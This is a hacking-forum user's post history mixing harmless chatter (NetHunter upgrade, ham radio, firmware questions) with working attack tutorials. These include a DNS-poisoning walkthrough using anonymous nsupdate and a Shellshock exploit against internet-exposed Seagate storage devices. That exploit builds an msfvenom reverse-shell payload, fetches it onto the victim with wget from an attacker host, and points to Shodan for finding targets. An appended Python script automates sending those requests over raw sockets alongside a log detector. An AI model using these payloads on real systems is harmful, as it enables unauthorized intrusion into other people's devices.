Show Posts



Messages - AnarchyAngel

1
Tutorials / Upgrading to NetHunter 2 on Nexus 7
« on: January 24, 2016, 02:57:36 am »
I love Kali, so naturally I put NetHunter 1 on my old Nexus 7 tablet and used it for a while, but then NetHunter 2 came along and didn't really offer an upgrade path from 1 to 2. Everything was geared to first installs. Lucky for me, the process to do so was really easy if you already put NetHunter on your tablet.

Basically all I had to do was put the new NetHunter zip file downloaded from HERE on the root of the sdcard and boot into Fastboot mode (from a powered-down state, press and hold the power + volume down buttons). Then I selected recovery mode and used the TeamWin loader (it was still set up from when I first set up NetHunter 1) to install the zip from the sdcard, and poof, NetHunter was updated to the latest. I did lose all data, but I don't keep anything on it, so that was no big deal.

The one hang-up I have found so far is that you need to get pciutils for wifite to work. Just run the following command:
Code:
apt-get install pciutils
Thank you and happy hacking :)

OP: http://aahideaway.blogspot.com/2016/01/upgrading-to-nethunter-2-on-nexus-7.html

2
Tutorials / Exploiting CVE-1999-0184 DNS Poisoning
« on: December 10, 2015, 02:12:33 am »
Yes this CVE is old, but I keep seeing it and there is no real tool or exploit guides available so I thought I would make one up right quick.

This "guide" is for Kali 2, and the basics of what's going on is that the target DNS server allows anonymous DNS updates. The one tool we will need is nsupdate. If it's not already on your system you can just run apt.
Code:
apt-get install dnsutils
Now we will need to start with a file that has all our commands in it. It should look something like this:
Code:
; our target DNS server
server 1.2.3.4
; the zone we are working in
zone corp.company.com
; remove any existing A records first, just in case
update delete evil.corp.company.com. A
update add evil.corp.company.com. 86400 IN A 2.2.2.2
show
send
Save the file as dns. Now just run the following command:
Code:
nsupdate -v dns
nsupdate should read all the commands in the dns file and send them to our target DNS server. After a few seconds you should see something similar to this:
Code:
Outgoing update query:
;; ->>HEADER<<- opcode: UPDATE, status: NOERROR, id: 0
;; flags:; ZONE: 0, PREREQ: 0, UPDATE: 0, ADDITIONAL: 0
;; ZONE SECTION:
;corp.company.com.  IN SOA

;; UPDATE SECTION:
evil.corp.company.com. 0 ANY A
evil.corp.company.com. 86400 IN A 2.2.2.2
Now just run a quick DiG query to make sure it worked.
Code:
dig @1.2.3.4 A evil.corp.company.com
That is all I have for this post. Happy hacking :)

OP: http://aahideaway.blogspot.com/2015/12/exploiting-cve-1999-0184-dns-poisoning.html

3
Fucking google-fu was weak today, lol, thanks.

no problem

4
You know, I seem to remember rooting a hosting server on a Russian ISP called ROPNet a couple of years back, and sitting on it for a few months when all of a sudden it was owned at a lower level by a perl bot written by a group called Angels of Anarchy or Anarchy Angels...something like that. They were American and most of them from Wisconsin. I don't suppose you would know anything about that would you OP?

maybe, maybe not.  :P

5
Ah, I've never heard of that tool, wish it was open source.

it is open source. - http://www.openvas.org/

6
My guess would be, if he is scanning across the internet, it's either masscan or nmap, those are the two that would either be the most popular or be the fastest to scan for mass exploitation.

Good guess, but I was using OpenVAS because it was a smaller scope (the ranges I was scanning) and I like its reporting.

7
I have been scanning some ranges in my free time and came across a Seagate GoFlex Home Network Storage System which my scanner flagged as being vulnerable to Shellshock, but getting a remote shell was no easy task (for me anyway). I ended up having to build a payload with msfvenom, doing the execution using Burp Suite and handling the shell with the Metasploit handler. The best part is this device uses UPnP to tunnel to the Internet, giving us easy access >;)

Start with the payload:

Code:
msfvenom -p php/meterpreter/reverse_tcp lport=4444 lhost=1.2.3.4 >msf.txt
Now upload msf.txt to your web server. After the payload is uploaded open metasploit and

Code:
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 1.2.3.4
set LPORT 4444
run

That should start up our listener. Now we need to open up burp and use the repeater. Enter the following for the request:

Code:
GET /support/ HTTP/1.1
Host: 5.6.7.8
User-Agent: () { :; }; echo Content-Type: text/plain; echo; echo; PATH=/usr/bin:/usr/local/bin:/bin; export PATH; wget http://1.2.3.4/msf.txt -O /tmp/msf.php 2>&1;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

Also don't forget to configure the target correctly. Hit go and wait a few seconds and you should see some wget output and if all went well you should now have uploaded msf.php to the /tmp/ dir of the device. Now we just need to execute it. For this we use burp again. This time put this in the request:

Code:
GET /support/ HTTP/1.1
Host: 5.6.7.8
User-Agent: () { :; }; echo Content-Type: text/plain; echo; echo; PATH=/usr/bin:/usr/local/bin:/bin; export PATH; php /tmp/msf.php;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

This time when you hit Go, and your ports are forwarded correctly, you should be able to go back to the msfconsole window and see a session has opened. You won't have root at this point, but you can still do a lot of fun stuff. You can find some of these devices on Shodan by searching for "hipname=". If anyone figures out how to get root please share :) Enjoy!

*Count of vulnerable devices taken from Shodan search results, not actual testing.
**I did not test it, but you could try to use the linux/x86/exec payload in the bash bug exploit module to deploy and execute. This would allow you to keep it all in Metasploit.

Original post - http://aahideaway.blogspot.com/2015/11/getting-remote-shell-on-any-one-of.html
Check it out for more information on this and other posts.
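Added example (not from the original post or the author's blog): the two requests from the post built as raw HTTP so they can be sent with a plain socket instead of Burp Repeater, plus the matching detection over web-server access logs, since the same `() { :; };` prefix that the CGI imports from the environment is what a defender greps for. Target 5.6.7.8, staging host 1.2.3.4, /tmp/msf.php and the /support/ CGI path are the post's placeholders; the access-log lines are constructed for the example.

```python
# Added example: Shellshock request builder (the post's two-stage payload) and
# a detector for the same pattern in combined-format access logs.
import re
import socket

# A bash function definition "() { ... }" followed by trailing commands in an
# environment variable is the Shellshock (CVE-2014-6271) trigger shape.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;\s*(?P<cmd>.+)")
PATH_SETUP = "PATH=/usr/bin:/usr/local/bin:/bin; export PATH;"


def shellshock_request(host, cmd, path="/support/"):
    """Raw HTTP/1.1 request whose User-Agent carries the function-definition prefix.
    The echo/Content-Type prefix makes the CGI emit a valid HTTP response so the
    command output comes back in the body."""
    ua = "() { :; }; echo Content-Type: text/plain; echo; echo; %s %s" % (PATH_SETUP, cmd)
    lines = ["GET %s HTTP/1.1" % path, "Host: %s" % host, "User-Agent: %s" % ua,
             "Accept: text/plain", "Connection: close", "", ""]
    return "\r\n".join(lines)


def stage_and_exec(target, attacker, payload="msf.txt", local="/tmp/msf.php"):
    """The post's two requests: fetch the PHP meterpreter stub, then run it."""
    fetch = "wget http://%s/%s -O %s 2>&1;" % (attacker, payload, local)
    run = "php %s;" % local
    return shellshock_request(target, fetch), shellshock_request(target, run)


def send_raw(request, host, port=80, timeout=10.0):
    """Deliver a raw request and return the response text (network call, not run in tests)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request.encode())
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode(errors="replace")


# Apache/nginx "combined" log format: client, ident, user, [time] "request" status bytes "referer" "ua"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
                    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"')


def detect_shellshock(log_lines):
    """Return (client ip, request line, injected command) for every log line whose
    User-Agent or Referer carries the '() { ... };' prefix; other lines are ignored."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for field in ("ua", "referer"):
            inj = SHELLSHOCK_RE.search(m.group(field))
            if inj:
                hits.append((m.group("ip"), m.group("req"), inj.group("cmd").strip()))
                break
    return hits


# Constructed sample log: one normal browser hit, then the post's two requests as they
# would appear from client 9.9.9.9 (hypothetical address).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Nov/2015:21:14:02 +0000] "GET /support/ HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64)"',
    '9.9.9.9 - - [10/Nov/2015:21:14:03 +0000] "GET /support/ HTTP/1.1" 200 88 "-" '
    '"() { :; }; echo Content-Type: text/plain; echo; echo; PATH=/usr/bin:/usr/local/bin:/bin; '
    'export PATH; wget http://1.2.3.4/msf.txt -O /tmp/msf.php 2>&1;"',
    '9.9.9.9 - - [10/Nov/2015:21:14:09 +0000] "GET /support/ HTTP/1.1" 200 0 "-" '
    '"() { :; }; echo Content-Type: text/plain; echo; echo; PATH=/usr/bin:/usr/local/bin:/bin; '
    'export PATH; php /tmp/msf.php;"',
]

if __name__ == "__main__":
    fetch_req, run_req = stage_and_exec("5.6.7.8", "1.2.3.4")
    print(fetch_req)
    for ip, req, cmd in detect_shellshock(SAMPLE_LOG):
        print("SHELLSHOCK from %s on %r: %s" % (ip, req, cmd))
    # print(send_raw(fetch_req, "5.6.7.8")); print(send_raw(run_req, "5.6.7.8"))
```

`send_raw` is what replaces Burp's Go button once the handler is listening; the detector side is the check a defender would drop into a log pipeline, and it matches on the function-definition shape rather than on a specific command, so the `php /tmp/msf.php` stage is caught just as well as the wget stage.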

8
Hacking and Security / Re: Malware I Got In An EMail Attachment
« on: June 18, 2014, 02:06:23 am »
What was in the headers? I have found fun info in them from time to time with emails like this.

9
Hacking and Security / Re: Voice spoofing android app???
« on: June 15, 2014, 09:34:47 pm »
I have seen at least one at a con that not only changes your voice but can add background noise like a casino or in the car. Not sure if it was an app or a call-in type service.

10
Reverse Engineering / reverse engineering modem firmware
« on: January 16, 2014, 06:03:18 pm »
So I'm trying to modify the firmware of a DDR2200 modem and add a few programs like netcat and so on.


image used - http://home.centurytel.net/ihd/ciscoddr2200/Cisco%20DDR-2200%203.40.5E%20DHCP%20Firmware%20for%20IPTV%20&%20HSI%20over%20ADSL2+%20Bonding.bin


I used binwalk and brfwmod to split the bin into rootfs.bin, kernl.bin, and tag.bin.
I then used lzma_unsquash to decompress rootfs.bin and edit the file system, then I zipped it back up, but I have no idea how to pack it with the kernl and tag bins into something the modem can use. Ideas?

11
General discussion / Re: 9/11
« on: September 11, 2013, 10:52:38 pm »
It's marked because, like it was said in another reply, it changed the US forever. For everyone in the US it was the death of an era, and for most a life-changing event. It took a confidence from us that helped define our way of life and replaced it with fear; we still have not fully recovered and likely won't for a good while yet.

12
General discussion / Re: ham mods
« on: September 09, 2013, 10:49:27 pm »
I have this installed in my car:

http://www.bellscb.com/products/tenmeter/CRE_8900.htm

If you order from bells, he'll do all the work for modding and tuning.


Nice, thanks. I'm hoping to find a handheld one for cons and shit.

13
General discussion / ham mods
« on: September 09, 2013, 06:15:09 pm »
Hey EZ, anyone know of a good ham radio I can buy that can be modded to transmit on citizen bands?

14
Hacking and Security / Re: A fun discussion
« on: September 03, 2013, 09:47:15 pm »
If VLANs are not an option, maybe subnetting is your solution.

15
Tutorials / Re: [tut] Sqlmap
« on: August 21, 2013, 03:43:26 pm »
Would be nice to see what you do to find the web root for uploading shells if there is no path disclosure in the SQL error output. I usually try looking in the HTTP server config files, but they can be a bitch to find.
